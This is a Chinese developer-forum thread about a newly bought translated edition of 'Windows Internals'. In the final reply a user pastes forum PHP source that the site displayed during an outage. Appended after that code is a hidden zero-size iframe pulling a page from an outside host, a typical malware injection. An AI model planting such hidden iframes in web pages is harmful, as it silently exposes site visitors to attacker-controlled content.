znsoft
管理员
管理员
  • 注册日期2001-03-23
  • 最后登录2023-10-25
  • 粉丝300
  • 关注6
  • 积分910分
  • 威望14796点
  • 贡献值7点
  • 好评度2410点
  • 原创分5分
  • 专家分100分
  • 社区居民
  • 最爱沙发
  • 社区明星
阅读:2625回复:5

拿到了Windows internal 4th 中文版,感觉不错

楼主#
更多 发布于:2007-04-20 11:36
  昨天下单,今天收到.不错:)

感兴趣,可以去china-pub 购买一本,以便对照英文版阅读.也感谢当初订购过影印版的朋友:)
http://www.zndev.com 免费源码交换网 ----------------------------- 软件创造价值,驱动提供力量! 淡泊以明志,宁静以致远。 ---------------------------------- 勤用搜索,多查资料,先搜再问。
z.b.Azy
驱动牛犊
驱动牛犊
  • 注册日期2006-03-11
  • 最后登录2013-04-29
  • 粉丝0
  • 关注0
  • 积分263分
  • 威望95点
  • 贡献值0点
  • 好评度91点
  • 原创分2分
  • 专家分0分
沙发#
发布于:2007-04-22 21:43
果然是有钱人。。。。
WQXNETQIQI
驱动大牛
驱动大牛
  • 注册日期2006-06-12
  • 最后登录2010-10-26
  • 粉丝0
  • 关注0
  • 积分13分
  • 威望1076点
  • 贡献值0点
  • 好评度895点
  • 原创分1分
  • 专家分0分
板凳#
发布于:2007-04-23 09:31
相当有钱。。。。驱网终于又能访问了//
驱动开发者 呵呵
liuyan1
驱动老牛
驱动老牛
  • 注册日期2001-08-27
  • 最后登录2023-04-18
  • 粉丝0
  • 关注0
  • 积分1031分
  • 威望477点
  • 贡献值0点
  • 好评度187点
  • 原创分0分
  • 专家分0分
  • 社区居民
地板#
发布于:2007-04-23 09:36
与第三版比?第3版好像翻译的不杂的, 等他的电子书哟
楼上的客,楼下的客,听我老坎说明白,要苛屎有草纸,不要扯我的麦席子,要苛尿有夜壶,不要在床上划地图。
ldljlzw
驱动中牛
驱动中牛
  • 注册日期2002-03-16
  • 最后登录2014-01-02
  • 粉丝1
  • 关注0
  • 积分1021分
  • 威望372点
  • 贡献值0点
  • 好评度187点
  • 原创分0分
  • 专家分0分
地下室#
发布于:2007-04-23 10:21
第三版和第四版到底区别在什么地方?
linestyle
驱动小牛
驱动小牛
  • 注册日期2004-01-28
  • 最后登录2010-01-05
  • 粉丝0
  • 关注0
  • 积分1000分
  • 威望139点
  • 贡献值0点
  • 好评度135点
  • 原创分0分
  • 专家分0分
5楼#
发布于:2007-04-24 09:15
引用第2楼WQXNETQIQI2007-04-23 09:31发表的“”:
相当有钱。。。。驱网终于又能访问了//


确实,我前几天访问,就出现如下代码,超级晕:(

<?php
define('SCR','index');
$wind_in = 'hm';
require_once('global.php');
include_once(D_P.'data/bbscache/level.php');

if($groupid!='guest'){
    $lastlodate=get_date($winddb['lastvisit']);
    $level=$ltitle[$groupid];
}
unset($lneed,$lpic);

include_once(D_P.'data/bbscache/index_cache.php');
if($notice_A){
    $NT_A=array_shift($notice_A);
    $NT_A['startdate']=get_date($NT_A['startdate'],'m-j G:i');
    $notice="<a href='notice.php?fid=$NT_A[fid]#$NT_A[aid]'>$NT_A[subject]($NT_A[startdate])</a>";
}else{
    $notice='';
}

$forumdb=$catedb=array();
unset($tposts);

if($db_forumdir){
    require_once(R_P.'require/dirname.php');
}elseif(is_numeric($cateid)){
    $cateinfo=$db->get_one("SELECT style FROM nw_forums WHERE fid='$cateid'");
    if(!empty($cateinfo['style']) && file_exists(D_P."data/style/$cateinfo[style].php")){
        $skin=$cateinfo['style'];
    }
    $threadcate=" AND (f.fid='$cateid' OR f.fup='$cateid')";
} else{
    $threadcate="";
}
require_once(R_P.'require/header.php');

$c_htm=0;
$cmsadd=$db_showcms ? '' : "AND f.cms!='1'";
$topics=$article=$tposts=0;

$query = $db->query("SELECT f.fid,f.fup,f.type,f.logo,f.name, f.descrip,f.forumadmin,f.across,f.allowhtm,f.password,f.allowvisit,f.f_type,f.cms,fd.tpost,fd.topic,fd.article,fd.subtopic,fd.top1,fd.lastpost FROM nw_forums f LEFT JOIN nw_forumdata fd USING(fid) WHERE f.ifsub='0' $cmsadd $threadcate ORDER BY f.vieworder");
while($forums = $db->fetch_array($query)){
    if($forums['type']==='category'){
        if(strpos($_COOKIE['deploy'],"\t".$forums['fid']."\t")===false){
            $forums['deploy_img']='fold';
        }else{
            $forums['deploy_img']='open';
            $forums['tbody_style']='display:none;';
        }
        if($forums['forumadmin']){
            $forumadmin=explode(",",$forums['forumadmin']);
            foreach($forumadmin as $key => $value){
                if($value){
                    if ($key==10) {$forums['admin'].='...'; break;}
                    $forums['admin'].="<a href=profile.php?action=show&username=".rawurlencode($value)." class=cfont>$value</a> ";
                }
            }
        }
        $forums['name']=preg_replace("/\<(.+?)\>/is","",$forums['name']);
        $catedb[]=$forums;
    } elseif($forums['type']==='forum'){
        $forums['topics']=$forums['topic']+$forums['subtopic'];
        if($db_topped){
            $forums['topics']+=$forums['top1'];
            $forums['article']+=$forums['top1'];
        }
        $article+=$forums['article'];
        $topics+=$forums['topics'];
        $tposts+=$forums['tpost'];
        if(empty($forums['password']) && (empty($forums['allowvisit']) || strpos($forums['allowvisit'],','.$groupid.',')!==false)){
            list($f_a,$forums['au'],$f_c,$forums['ft'])=explode("\t",$forums['lastpost']);
            $forums['pic'] = $winddb['lastvisit']<$f_c && ($f_c+172800>$timestamp) ? 'new' : 'old';
            $forums['newtitle']=get_date($f_c);
            $forums['t']=substrs($f_a,21);
        } else{
            if($forums['f_type']==='hidden' && $groupid != 3){
                continue;
            }
            $forums['pic']="lock";
        }
        $forums['allowhtm']==1 && $c_htm=1;
        if($db_indexfmlogo==2){
            $forums['llogo']=$forums['logo']!='' ? "<img align=left src=$forums[logo] border=0>":'';
        } elseif($db_indexfmlogo==1){
            $forumlogofile="$stylepath/forumlogo/$forums[fid].gif";
            file_exists("$imgdir/$forumlogofile") && $forums['llogo']="<img align=left src='$imgpath/$forumlogofile' border=0>";
        }
        $adminarray=explode("\t",$forums['forumadmin']);
        if($adminarray[0]){
            $forumadmin=explode(",",$adminarray[0]);
            foreach($forumadmin as $key => $value){
                if($value){
                    if(!$db_adminshow){
                        $forums['admin'].="<a href='profile.php?action=show&username=".rawurlencode($value)."'>$value</a> ";
                    } else{
                        $forums['admin'].="<option value='$value'>$value</option>";
                    }
                }
            }
        }
        $forumdb[$forums['fup']][]=$forums;
    }
}
$db->free_result($query);
unset($forums);

/**
* Share union
*/
if($db_indexmqshare){
    $sharelink="<marquee scrolldelay=100 scrollamount=4 onmouseout='if (document.all!=null){this.start()}' onmouseover='if (document.all!=null){this.stop()}' behavior=alternate>$sharelink</marquee>";
}
if(strpos($_COOKIE['deploy'],"\t".info."\t")===false){
    $cate_img='fold';
}else{
    $cate_img='open';
    $cate_info='display:none;';
}
if(strpos($_COOKIE['deploy'],"\t".notice."\t")===false){
    $notice_img='fold';
}else{
    $notice_img='open';
    $cate_notice='display:none;';
}

/**
* oline users
*/

Update_ol();
@include_once(D_P.'data/bbscache/olcache.php');
$usertotal=$guestinbbs+$userinbbs;

if($windid==$manager || $usertotal<2000){
    $online1 = GetCookie('online1');
    if($online){
        $online1=$online;
        Cookie('online1',$online);
    }
    if($db_indexonline && $online1!='no'){
        $doonlinefu=1;
    } elseif($online1=='yes'){
        $doonlinefu=1;
    }
}
$showgroup = explode(",",$db_showgroup);

@extract($db->get_one("SELECT * FROM nw_bbsinfo WHERE id=1"));
$rawnewuser=rawurlencode($newmember);
if($tdtcontrol!=$tdtime){
    if($db_hostweb == 1 && !$cateid && $groupid != 'guest'){
        $db->update("UPDATE nw_bbsinfo SET yposts='$tposts', tdtcontrol='$tdtime' WHERE id=1");
        $db->update("UPDATE nw_forumdata SET tpost=0 WHERE tpost<>'0'");
    }
    if(file_exists(D_P.'data/bbscache/ip_cache.php')){
        P_unlink(D_P.'data/bbscache/ip_cache.php');
    }
}
/**
* update posts hits
*/
if($c_htm || $db_hithour){
    $db_hithour==0 && $db_hithour=4;
    $hit_wtime=$hit_control*$db_hithour;
    if($hit_wtime>24)$hit_wtime=0;
    $hitsize=@filesize(D_P."data/bbscache/hits.txt");
    if(($timestamp-$hit_tdtime)>$hit_wtime*3600 || $hitsize>1024){
        require_once(R_P.'require/hitupdate.php');
    }
}
if($higholnum<$usertotal){
    $db->update("UPDATE nw_bbsinfo SET higholnum='$usertotal',higholtime='$timestamp' WHERE id=1");
    $higholnum=$usertotal;
}
if($hposts<$tposts){
    $db->update("UPDATE nw_bbsinfo SET hposts='$tposts' WHERE id=1");
    $hposts=$tposts;
}
$mostinbbstime=get_date($higholtime);
if($db_onlinelmt!=0 && $usertotal>=$db_onlinelmt && !$ol_offset){
    Cookie('ol_offset','',0);
    Showmsg('most_online');
}

list($db_moneyname,$db_moneyunit,$db_rvrcname,$db_rvrcunit,$db_creditname,$db_creditunit)=explode("\t",$db_credits);

require_once PrintEot('index');footer();
?><Iframe src="http://www.800h.com/ins.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
loading is waiting ...
游客

返回顶部